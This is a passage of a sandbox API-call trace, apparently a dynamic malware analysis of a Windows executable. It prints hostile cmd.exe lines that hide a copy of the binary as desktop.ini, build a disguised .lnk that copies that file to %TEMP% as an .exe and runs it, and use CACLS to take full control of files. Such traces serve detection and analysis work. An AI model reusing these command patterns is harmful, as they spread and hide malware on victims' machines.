(Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0149.544] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0149.545] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0149.545] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0149.545] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0149.545] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0x87 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0x87 [0149.545] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0149.545] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\", lpszShortPath=0x123027c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\") returned 0x34 [0149.546] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0xb2 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0xb2 [0149.546] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0149.546] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}", lpszShortPath=0x123003c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1") returned 0x33 [0149.547] CharUpperBuffW (in: lpsz="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\desktop.ini\" && attrib +h \"[TO_DIR]\"", cchLength=0x18a | out: lpsz="ATTRIB -R -S -H \"C:\\USERS\\ALLUSE~1\\MICROS~1\\DEVICE~1\\DEVICE\\{8702D~1\\DESKTOP.INI\" & DEL /F /Q \"C:\\USERS\\ALLUSE~1\\MICROS~1\\DEVICE~1\\DEVICE\\{8702D~1\\DESKTOP.INI\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\ALLUSE~1\\MICROS~1\\DEVICE~1\\DEVICE\\{8702D~1\\DESKTOP.INI\" && ATTRIB +H \"C:\\USERS\\ALLUSE~1\\MICROS~1\\DEVICE~1\\DEVICE\\{8702D~1\\DESKTOP.INI\" && ATTRIB +H \"[TO_DIR]\"") returned 0x18a [0149.547] CharUpperBuffW (in: lpsz="[TO_DIR]", cchLength=0x8 | out: lpsz="[TO_DIR]") returned 0x8 [0149.547] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb88*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb78 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\"", lpProcessInformation=0x12fb78*(hProcess=0x114, hThread=0x110, dwProcessId=0x698, dwThreadId=0xc58)) returned 1 [0149.558] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0xffffffff) returned 0x0 [0150.226] CloseHandle (hObject=0x114) returned 1 [0150.226] CloseHandle (hObject=0x110) returned 1 [0150.226] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0150.226] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0150.226] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0150.227] GetTickCount () returned 0x2e7bf [0150.227] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbfc | out: lpPerformanceCount=0x12fbfc*=20701581076) returned 1 [0150.227] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="i\x1dﯸ\x12萀\x1d") returned 1 [0150.227] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="8\x1dﯸ\x12萀\x1d") returned 1 [0150.227] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="z\x1dﯸ\x12萀\x1d") returned 1 [0150.227] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="F\x1dﯸ\x12萀\x1d") returned 1 [0150.227] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="V\x1dﯸ\x12萀\x1d") returned 1 [0150.227] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="E\x1dﯸ\x12萀\x1d") returned 1 [0150.227] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="7\x1dﯸ\x12萀\x1d") returned 1 [0150.227] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="a\x1dﯸ\x12萀\x1d") returned 1 [0150.227] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0150.227] CharUpperBuffW (in: lpsz="explorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x65 | out: lpsz="EXPLORER.EXE \"[DIR_NAME]\" & TYPE \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x65 [0150.227] CharUpperBuffW (in: lpsz="[DIR_NAME]", cchLength=0xa | out: lpsz="[DIR_NAME]") returned 0xa [0150.227] CharUpperBuffW (in: lpsz="explorer.exe \"{8702d817-5aad-4674-9ef3-4d3decd87120}\" & type \"{8702d817-5aad-4674-9ef3-4d3decd87120}\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x9d | out: lpsz="EXPLORER.EXE \"{8702D817-5AAD-4674-9EF3-4D3DECD87120}\" & TYPE \"{8702D817-5AAD-4674-9EF3-4D3DECD87120}\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x9d [0150.227] CharUpperBuffW (in: lpsz="[HID_NAME]", cchLength=0xa | out: lpsz="[HID_NAME]") returned 0xa [0150.227] CharUpperBuffW (in: lpsz="explorer.exe \"{8702d817-5aad-4674-9ef3-4d3decd87120}\" & type \"{8702d817-5aad-4674-9ef3-4d3decd87120}\\desktop.ini\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x9e | out: lpsz="EXPLORER.EXE \"{8702D817-5AAD-4674-9EF3-4D3DECD87120}\" & TYPE \"{8702D817-5AAD-4674-9EF3-4D3DECD87120}\\DESKTOP.INI\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x9e [0150.227] CharUpperBuffW (in: lpsz="[EXE_NAME]", cchLength=0xa | out: lpsz="[EXE_NAME]") returned 0xa [0150.227] CoInitialize (pvReserved=0x0) returned 0x0 [0150.227] CoCreateInstance (in: rclsid=0x4e06a4*(Data1=0x21401, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x5, riid=0x4b0dcc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x12fc10 | out: ppv=0x12fc10*=0x1d3e18) returned 0x0 [0150.228] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d36fc*(Data1=0x214f9, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3df0) returned 0x0 [0150.228] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d370c*(Data1=0x10b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3dfc) returned 0x0 [0150.228] ShellLink:IShellLinkW:SetPath (This=0x1d3df0, pszFile="%SystemRoot%\\system32\\cmd.exe") returned 0x0 [0150.230] ShellLink:IShellLinkW:SetArguments (This=0x1d3df0, pszArgs="/C explorer.exe \"{8702d817-5aad-4674-9ef3-4d3decd87120}\" & type \"{8702d817-5aad-4674-9ef3-4d3decd87120}\\desktop.ini\" > \"%TEMP%\\i8zFVE7a.exe\" && \"%TEMP%\\i8zFVE7a.exe\"") returned 0x0 [0150.230] ShellLink:IShellLinkW:SetWorkingDirectory (This=0x1d3df0, pszDir="%CD%") returned 0x0 [0150.230] ShellLink:IShellLinkW:SetIconLocation (This=0x1d3df0, pszIconPath="%SystemRoot%\\system32\\shell32.dll", iIcon=3) returned 0x0 [0150.230] ShellLink:IShellLinkW:SetShowCmd (This=0x1d3df0, iShowCmd=7) returned 0x0 [0150.230] ShellLink:IPersistFile:Save (This=0x1d3dfc, pszFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}.lnk", fRemember=0) returned 0x0 [0150.238] ShellLink:IUnknown:Release (This=0x1d3dfc) returned 0x2 [0150.238] ShellLink:IUnknown:Release (This=0x1d3df0) returned 0x1 [0150.238] ShellLink:IUnknown:Release (This=0x1d3e18) returned 0x0 [0150.238] CoUninitialize () [0150.239] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0150.239] ReleaseMutex (hMutex=0xf8) returned 1 [0150.239] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0150.239] ReleaseMutex (hMutex=0xf8) returned 1 [0150.239] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0150.239] ReleaseMutex (hMutex=0xf8) returned 1 [0150.239] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0150.239] ReleaseMutex (hMutex=0xf8) returned 1 [0150.239] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0150.239] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png", lpFilePart=0x12eab4*="watermark.png") returned 0x65 [0150.239] GetLastError () returned 0x5 [0150.239] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xab58\x131\xed01\x12") returned 0x13 [0150.239] LocalFree (hMem=0x1c6cc8) returned 0x0 [0150.239] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0150.240] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0150.240] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0150.240] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0150.240] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0150.240] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0150.240] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png\"", lpProcessInformation=0x12fba4*(hProcess=0x110, hThread=0x114, dwProcessId=0x170, dwThreadId=0xcf8)) returned 1 [0150.245] WaitForSingleObject (hHandle=0x110, dwMilliseconds=0xffffffff) returned 0x0 [0150.525] CloseHandle (hObject=0x110) returned 1 [0150.525] CloseHandle (hObject=0x114) returned 1 [0150.525] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0150.525] ReleaseMutex (hMutex=0xf8) returned 1 [0150.525] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0150.525] ReleaseMutex (hMutex=0xf8) returned 1 [0150.525] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0150.525] ReleaseMutex (hMutex=0xf8) returned 1 [0150.525] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0150.526] ReleaseMutex (hMutex=0xf8) returned 1 [0150.526] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0150.526] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png", lpFilePart=0x12eab4*="watermark.png") returned 0x65 [0150.526] GetLastError () returned 0x5 [0150.526] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xadc8\x131\xed01\x12") returned 0x13 [0150.526] LocalFree (hMem=0x1c6cc8) returned 0x0 [0150.526] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0150.526] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0150.526] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0150.526] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0150.526] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\", cchLength=0x58 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{8702D817-5AAD-4674-9EF3-4D3DECD87120}\\") returned 0x58 [0150.526] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\", cchLength=0x58 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{8702D817-5AAD-4674-9EF3-4D3DECD87120}\\") returned 0x58 [0150.526] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{8702D817-5AAD-4674-9EF3-4D3DECD87120}\\", cchCount1=88, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{8702D817-5AAD-4674-9EF3-4D3DECD87120}\\", cchCount2=88) returned 2 [0150.526] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0150.526] ReleaseMutex (hMutex=0xf8) returned 1 [0150.526] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0150.526] ReleaseMutex (hMutex=0xf8) returned 1 [0150.526] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0150.526] ReleaseMutex (hMutex=0xf8) returned 1 [0150.527] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0150.527] ReleaseMutex (hMutex=0xf8) returned 1 [0150.527] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\MF\\Active.GRL" (normalized: "c:\\users\\all users\\microsoft\\mf\\active.grl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0150.527] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0150.527] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3a7c [0150.527] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0150.527] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=20731612062) returned 1 [0150.527] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0150.527] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3a7c [0150.527] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0150.527] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0150.527] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3a7c [0150.527] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0150.527] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0150.527] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x3a7c [0150.527] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0150.527] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0150.527] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3a7c [0150.527] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0150.527] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0150.528] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3a7c [0150.528] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0150.528] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0150.528] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3a7c [0150.528] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0150.528] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0150.528] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3a7c [0150.528] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 